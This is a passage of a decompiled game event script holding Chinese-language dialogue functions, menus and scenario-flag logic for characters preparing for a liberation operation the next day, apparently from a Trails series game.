Call(0, 25) Jump("loc_18EA") label("loc_186C") ChrTalk( 0xF, ( "#10106F那、那个……\x01", "我有件事必须要拜托\x01", "罗伊德警官。\x02\x03", "#10101F稍后请到甲板来找我吧。\x01", "我处理完手边的事情之后\x01", "就会过去的……\x02", ) ) CloseMessageWindow() label("loc_18EA") Jump("loc_1963") label("loc_18EF") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1901") Call(0, 10) Jump("loc_1963") label("loc_1901") ChrTalk( 0xF, ( "#10100F我今天晚上还要\x01", "再和司令联络一次。\x02\x03", "#10103F为了明天的作战,\x01", "还是再做一次最终确认为好。\x02", ) ) CloseMessageWindow() label("loc_1963") TalkEnd(0xFE) Return() # Function_9_1849 end def Function_10_1967(): pass label("Function_10_1967") OP_52(0x101, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xF, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0xF, 0x10) TurnDirection(0xF, 0x101, 0) OP_52(0xF, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_IMOD), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xF, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x5), scpexpr(EXPR_SUB), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xF, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_PUSH_LONG, 0xB4), scpexpr(EXPR_IDIV), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2D), scpexpr(EXPR_LEQ), scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_PUSH_LONG, 0x13B), scpexpr(EXPR_GE), scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_PUSH_LONG, 0x195), scpexpr(EXPR_LEQ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_OR), scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2A3), scpexpr(EXPR_GE), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_19F8") Jump("loc_1A42") label("loc_19F8") Jc((scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x5), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_LSS), scpexpr(EXPR_END)), "loc_1A18") OP_52(0xF, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_1A42") label("loc_1A18") Jc((scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x5), scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_GTR), scpexpr(EXPR_END)), "loc_1A38") OP_52(0xF, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_1A42") label("loc_1A38") OP_52(0xF, 0x8, (scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_1A42") OP_52(0xF, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0x101, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x101, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xF, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) SetChrFlags(0xF, 0x10) ClearChrFlags(0xF, 0x10) TurnDirection(0xC, 0x101, 0) OP_4B(0xC, 0xFF) ChrTalk( 0x101, ( "#00000F辛苦你们了,诺艾尔、芙兰。\x02\x03", "#00002F明天就要展开作战了,\x01", "但这里的气氛却很平和呢。\x02", ) ) CloseMessageWindow() ChrTalk( 0xF, ( "#10102F真不好意思。\x02\x03", "#10106F我正在检修武器,\x01", "芙兰却突然跑了进来……\x02", ) ) CloseMessageWindow() ChrTalk( 0xC, ( "#01909F呵呵,我是来给\x01", "姐姐打气的~\x02\x03", "#01904F因为我已经做好了\x01", "充足的准备。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00009F哈哈,真是可靠啊。\x02\x03", "#00000F芙兰,你明天也要在\x01", "后援岗位上大显身手哦,\x01", "今天就尽量养精蓄锐吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0xC, ( "#01902F嗯,当然~\x01", "……其实,我就是为了\x01", "这个才来的~!\x02\x03", "#01909F不管怎么说,\x01", "我只要待在姐姐身边,\x01", "就可以补充能量了呢!\x02", ) ) CloseMessageWindow() OP_63(0x101, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1) Sound(23, 0, 100, 0) OP_63(0xF, 0x0, 1700, 0x10, 0x13, 0xFA, 0x1) Sound(23, 0, 100, 0) Sleep(1000) ChrTalk( 0x101, ( "#00000F哈哈,也许\x01", "正如你所说。\x02", ) ) CloseMessageWindow() ChrTalk( 0xF, ( "#10106F唉,真是的……\x01", "只要别妨碍到我就好。\x02\x03", "#10100F那、那个,罗伊德警官,\x01", "我今天晚上还要\x01", "再和司令联络一次。\x02\x03", "#10103F为了明天的作战,\x01", "还是再做一次最终确认为好。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00004F嗯,那就拜托你了。\x02\x03", "#00000F诺艾尔,检修完武器之后,\x01", "要早点休息哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0xF, "#10109F好的!\x02", ) CloseMessageWindow() SetChrSubChip(0xF, 0x0) OP_93(0xC, 0x10E, 0x0) OP_4C(0xC, 0xFF) SetScenarioFlags(0x1DB, 0) Return() # Function_10_1967 end def Function_11_1DBE(): pass label("Function_11_1DBE") TalkBegin(0xFE) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x69), scpexpr(EXPR_PUSH_LONG, 0x12), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_1E52") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1DE1") Call(0, 26) Jump("loc_1E4D") label("loc_1DE1") ChrTalk( 0xA, ( "#10404F还有一件事,\x01", "我觉得应该悄悄\x01", "告诉你。\x02\x03", "#10402F稍后到甲板上来吧。\x01", "我和阿巴斯喝完酒以后\x01", "就会过去。\x02", ) ) CloseMessageWindow() label("loc_1E4D") Jump("loc_1EFB") label("loc_1E52") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1E64") Call(0, 12) Jump("loc_1EFB") label("loc_1E64") ChrTalk( 0xA, ( "#10404F总之,既然上面已经下达了许可,\x01", "我们就不必再顾虑其它事情,\x01", "只需专心完成使命即可。\x02\x03", "#10402F呵呵,看来明天会很忙碌呢,\x01", "要趁现在好好休息一番。\x02", ) ) CloseMessageWindow() label("loc_1EFB") TalkEnd(0xFE) Return() # Function_11_1DBE end def Function_12_1EFF(): pass label("Function_12_1EFF") OP_52(0x101, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xA, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0xA, 0x10) TurnDirection(0xA, 0x101, 0) OP_52(0xA, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_IMOD), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xA, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x5), scpexpr(EXPR_SUB), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xA, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_PUSH_LONG, 0xB4), scpexpr(EXPR_IDIV), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2D), scpexpr(EXPR_LEQ), scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_PUSH_LONG, 0x13B), scpexpr(EXPR_GE), scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_PUSH_LONG, 0x195), scpexpr(EXPR_LEQ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_OR), scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2A3), scpexpr(EXPR_GE), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_1F90") Jump("loc_1FDA") label("loc_1F90") Jc((scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x5), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_LSS), scpexpr(EXPR_END)), "loc_1FB0") OP_52(0xA, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_1FDA") label("loc_1FB0") Jc((scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x5), scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_GTR), scpexpr(EXPR_END)), "loc_1FD0") OP_52(0xA, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_1FDA") label("loc_1FD0") OP_52(0xA, 0x8, (scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_1FDA") OP_52(0xA, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0x101, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x101, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xA, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) SetChrFlags(0xA, 0x10) OP_52(0x101, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x8, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x8, 0x10) TurnDirection(0x8, 0x101, 0) OP_52(0x8, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_IMOD), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x8, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x5), scpexpr(EXPR_SUB), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x8, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_PUSH_LONG, 0xB4), scpexpr(EXPR_IDIV), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2D), scpexpr(EXPR_LEQ), scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_PUSH_LONG, 0x13B), scpexpr(EXPR_GE), scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_PUSH_LONG, 0x195), scpexpr(EXPR_LEQ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_OR), scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2A3), scpexpr(EXPR_GE), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_2090") Jump("loc_20DA") label("loc_2090") Jc((scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x5), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_LSS), scpexpr(EXPR_END)), "loc_20B0") OP_52(0x8, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_20DA") label("loc_20B0") Jc((scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x5), scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_GTR), scpexpr(EXPR_END)), "loc_20D0") OP_52(0x8, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_20DA") label("loc_20D0") OP_52(0x8, 0x8, (scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_20DA") OP_52(0x8, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0x101, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x101, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x8, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) SetChrFlags(0x8, 0x10) ClearChrFlags(0xA, 0x10) ClearChrFlags(0x8, 0x10) ChrTalk( 0x101, ( "#00005F瓦吉、阿巴斯……\x01", "你们在喝酒吗?\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, ( "#10404F嗯,因为我们已经\x01", "完成了必要的准备工作。\x02\x03", "#10402F呵呵,你要不要也来一杯?\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00006F喂喂……明天还要作战呢,\x01", "你们这样没问题吗?\x02\x03", "#00001F边上已经摆着很多\x01", "被你们喝空的杯子了……\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#12100F不必担心,\x01", "这是让维恩图斯特地\x01", "调制的无酒精鸡尾酒。\x02\x03", "不会对明天的作战\x01", "造成任何影响。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00006F啊,是这样啊……\x02\x03", "#00000F算啦,既然阿巴斯这么说,\x01", "那我这次就相信了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, ( "#10409F呵呵,我一个人喝的时候,\x01", "你也应该相信啊。\x02\x03", "#10403F……对了,有件事情还是\x01", "通知你一声比较好。\x02\x03", "#10400F关于明天的作战,法王阁下\x01", "已经下达了正式的参战许可。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00005F啊……是吗。\x02", ) CloseMessageWindow() ChrTalk( 0x8, ( "#12100F梅尔卡瓦的主要用途是执行\x01", "隐秘活动,本应尽量避免将其\x01", "使用于大规模的作战中……\x02\x03", "但考虑到整个大陆的混乱状况,\x01", "就算稍微有所暴露,也是没有办法。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00006F这样啊……\x01", "教会能做出这种判断,真是值得感谢。\x02\x03", "#00013F……总之,明天就要决战了,\x01", "还请二位助我一臂之力。\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, "#10402F呵呵,明白了,队长。\x02", ) CloseMessageWindow() ChrTalk( 0x8, "#12102F我们自然会全力相助。\x02", ) CloseMessageWindow() SetChrSubChip(0xA, 0x0) SetChrSubChip(0x8, 0x0) SetScenarioFlags(0x1DB, 1) Return() # Function_12_1EFF end def Function_13_24BA(): pass label("Function_13_24BA") TalkBegin(0xFE) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x69), scpexpr(EXPR_PUSH_LONG, 0x12), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_25D4") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_24E2") Call(0, 26) Jump("loc_25CF") label("loc_24E2") RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_24EC") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_25CF") Menu( 0, -1, -1, 1, ( "对话\x01", # 0 "编组队伍\x01", # 1 "放弃\x01", # 2 ) ) MenuEnd(0x0) OP_60(0x0) Switch( (scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_END)), (0, "loc_2533"), (1, "loc_25A4"), (SWITCH_DEFAULT, "loc_25C0"), ) label("loc_2533") ChrTalk( 0x8, ( "#12100F真是的……\x01", "那可是机密事项啊。\x02\x03", "#12102F……算了,这也没办法。\x01", "让你们知道,应该也不会有什么问题。\x02", ) ) CloseMessageWindow() Jump("loc_25CA") label("loc_25A4") OP_32(0xFF, 0xF9, 0x0) PartySelect(0) Fade(500) OP_0D() RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_25CA") label("loc_25C0") RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_25CA") Jump("loc_24EC") label("loc_25CF") Jump("loc_26E6") label("loc_25D4") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_25E6") Call(0, 12) Jump("loc_26E6") label("loc_25E6") RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_25F0") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_26E6") Menu( 0, -1, -1, 1, ( "对话\x01", # 0 "编组队伍\x01", # 1 "放弃\x01", # 2 ) ) MenuEnd(0x0) OP_60(0x0) Switch( (scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_END)), (0, "loc_2637"), (1, "loc_26BB"), (SWITCH_DEFAULT, "loc_26D7"), ) label("loc_2637") ChrTalk( 0x8, ( "#12100F在明天的作战中……\x01", "我们会在梅尔卡瓦上\x01", "专心为你们提供后援支持。\x02\x03", "而你们则要潜入市内,\x01", "所以最好趁现在\x01", "做好充分准备。\x02", ) ) CloseMessageWindow() Jump("loc_26E1") label("loc_26BB") OP_32(0xFF, 0xF9, 0x0) PartySelect(0) Fade(500) OP_0D() RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_26E1") label("loc_26D7") RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_26E1") Jump("loc_25F0") label("loc_26E6") TalkEnd(0xFE) Return() # Function_13_24BA end def Function_14_26EA(): pass label("Function_14_26EA") TalkBegin(0xFE) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x68), scpexpr(EXPR_PUSH_LONG, 0x16), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_2799") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_270D") Call(0, 25) Jump("loc_2794") label("loc_270D") ChrTalk( 0xC, ( "#01900F罗伊德警官,请你一定要认真\x01", "倾听姐姐的愿望哦。\x02\x03", "#01909F呵呵,真期待结果呢~\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00003F(唔……芙兰为什么\x01", " 这么兴奋……)\x02", ) ) CloseMessageWindow() label("loc_2794") Jump("loc_280C") label("loc_2799") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_27AB") Call(0, 10) Jump("loc_280C") label("loc_27AB") ChrTalk( 0xC, ( "#01902F罗伊德警官,\x01", "明天一定要加油哦~\x02\x03", "#01909F我也会通过姐姐\x01", "来补充能量,\x01", "做好万全准备的!\x02", ) ) CloseMessageWindow() label("loc_280C") TalkEnd(0xFE) Return() # Function_14_26EA end def Function_15_2810(): pass label("Function_15_2810") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_2B36") ChrTalk( 0x9, ( "#02300F在你们明天潜入克洛斯贝尔市的\x01", "同时,我们也会在梅尔卡瓦上\x01", "发动网络入侵。\x02\x03", "#02303F总之,你们就多加努力,\x01", "在市内闹个天翻地覆吧。\x02\x03", "#02302F只要在市内造成混乱,\x01", "应该就会出现能成功\x01", "侵入导力网络的机会。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00004F嗯,我们一起加油,\x01", "努力完成各自的任务吧。\x02\x03", "#00001F……话说回来,约纳……\x01", "你今晚该不会是准备\x01", "熬一通宵吧?(盯视)\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, ( "#02305F……呃!\x02\x03", "#02309F这、这个嘛……\x01", "虽然准备工作已经做得差不多了,\x01", "但我毕竟是夜行生物嘛。\x02\x03", "#02304F而且,与其明明睡不着\x01", "却硬要去睡,也许还是\x01", "通宵之后的精神状态更好呢。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00006F我说你啊……\x01", "明天的作战可是一场持久战,\x01", "你要是通宵,说不定会撑不下来的。\x02\x03", "#00001F既然准备工作已经快完成了,\x01", "你就尽早去休息吧。\x01", "肯定还是休息之后的精神状态更好。\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, ( "#02306F好啦好啦,我知道了。\x02\x03", "#02300F手头的事情告一段落之后,我就会收工\x01", "去休息的,你不要一直盯着我嘛。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DB, 3) Jump("loc_2BBA") label("loc_2B36") ChrTalk( 0x9, ( "#02300F明天的网络入侵行动的\x01", "准备工作就快完成了。\x02\x03", "#02306F手头事情告一段落之后,我就会收工\x01", "去休息的,你不要动不动就过来盯梢啊。\x02", ) ) CloseMessageWindow() label("loc_2BBA") TalkEnd(0xFE) Return() # Function_15_2810 end def Function_16_2BBE(): pass label("Function_16_2BBE") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 4)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_2EE0") ChrTalk( 0x12, ( "#02103F对现有体制持有异议的人们\x01", "集结在一起,抱着拼死的觉悟而\x01", "发动『解放克洛斯贝尔市作战』……\x02\x03", "#02101F如果这次的作战以失败而告终,\x01", "世人恐怕就会得出『总统才是正确的』\x01", "这种结论。\x02\x03", "#02103F就像卡尔瓦德一样,在过去的\x01", "民主化过程中所策动的种种阴谋,\x01", "如今都已被解释为正当合法的行为了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00003F……是啊。\x02\x03", "#00001F甚至可以说……\x01", "是非成败,全都取决于明天的结果。\x01", "我非常明白这一点。\x02", ) ) CloseMessageWindow() ChrTalk( 0x12, ( "#02109F哈哈哈,其实我并没打算\x01", "给你施加压力。\x02\x03", "#02103F……作为一名记者,我的义务\x01", "是亲眼见证克洛斯贝尔的命运,\x01", "并将其传达给大众。\x02\x03", "#02100F不过,抛开新闻工作者这层身份,\x01", "我更希望站在一名普通人的立场上\x01", "来支持你们。\x02\x03", "#02104F为你们这个继承了盖伊先生的意志\x01", "而诞生的特别任务支援科加油呐喊。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00002F格蕾丝小姐……\x02", ) CloseMessageWindow() ChrTalk( 0x12, ( "#02109F呵呵,为了小琪雅……\x01", "你们明天一定要拼尽全力哦!\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00000F嗯,放心吧!\x02", ) CloseMessageWindow() SetScenarioFlags(0x1DB, 4) Jump("loc_2F63") label("loc_2EE0") ChrTalk( 0x12, ( "#02100F抛开新闻工作者这层身份,\x01", "我更希望站在一名普通人的立场上\x01", "来支持你们。\x02\x03", "#02109F为了小琪雅……\x01", "你们明天一定要拼尽全力哦!\x02", ) ) CloseMessageWindow() label("loc_2F63") TalkEnd(0xFE) Return() # Function_16_2BBE end def Function_17_2F67(): pass label("Function_17_2F67") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 5)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_31CB") ChrTalk( 0x11, ( "#02503F……明天恐怕将会是\x01", "十分艰辛的一天。\x02\x03", "#02500F竟然让你们这些年轻人\x01", "来背负『自治州的命运』\x01", "这个沉重负担。\x02\x03", "#02503F身为自治州的代表之一……\x01", "我要向你们表示歉意。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00003F……请您不要\x01", "这么说。\x02\x03", "#00000F麦克道尔议长,您已经\x01", "完成了发表『独立无效宣言』\x01", "这个重要的职责。\x02\x03", "#00004F至于接下来的事情,\x01", "就必须要由我们这些\x01", "战斗人员来亲手解决了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x11, ( "#02503F……真不好意思,\x01", "实在是辛苦你们了。\x02\x03", "#02500F既然如此,我就以你们一定能够\x01", "在『解放作战』中取得胜利为前提,\x01", "继续考虑今后的对策吧。\x02\x03", "#02503F这也是为了让陷入混乱的克洛斯贝尔\x01", "居民们尽早恢复到正常生活之中。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00000F好……那就拜托您了。\x02", ) CloseMessageWindow() SetScenarioFlags(0x1DB, 5) Jump("loc_323F") label("loc_31CB") ChrTalk( 0x11, ( "#02503F我就以你们一定能够\x01", "在『解放作战』中取得胜利为前提,\x01", "继续考虑今后的对策吧。\x02\x03", "#02500F……愿女神保佑你们。\x02", ) ) CloseMessageWindow() label("loc_323F") TalkEnd(0xFE) Return() # Function_17_2F67 end def Function_18_3243(): pass label("Function_18_3243") Call(0, 19) Return() # Function_18_3243 end def Function_19_3247(): pass label("Function_19_3247") TalkBegin(0x14) RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_3254") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x63), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3515") FadeToDark(300, 0, 100) Menu( 0, -1, -1, 1, ( "对话\x01", # 0 "购买装备\x01", # 1 "购买消耗品\x01", # 2 "放弃\x01", # 3 ) ) MenuEnd(0x0) Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_32B3") OP_60(0x0) FadeToBright(300, 0) OP_0D() label("loc_32B3") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3333") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A7, 1)), scpexpr(EXPR_END)), "loc_32D2") OP_AF(0xD8) Jump("loc_3324") label("loc_32D2") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A4, 1)), scpexpr(EXPR_END)), "loc_32E2") OP_AF(0xD7) Jump("loc_3324") label("loc_32E2") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A3, 3)), scpexpr(EXPR_END)), "loc_32F2") OP_AF(0xD6) Jump("loc_3324") label("loc_32F2") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A2, 7)), scpexpr(EXPR_END)), "loc_3302") OP_AF(0xD5) Jump("loc_3324") label("loc_3302") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A1, 7)), scpexpr(EXPR_END)), "loc_3312") 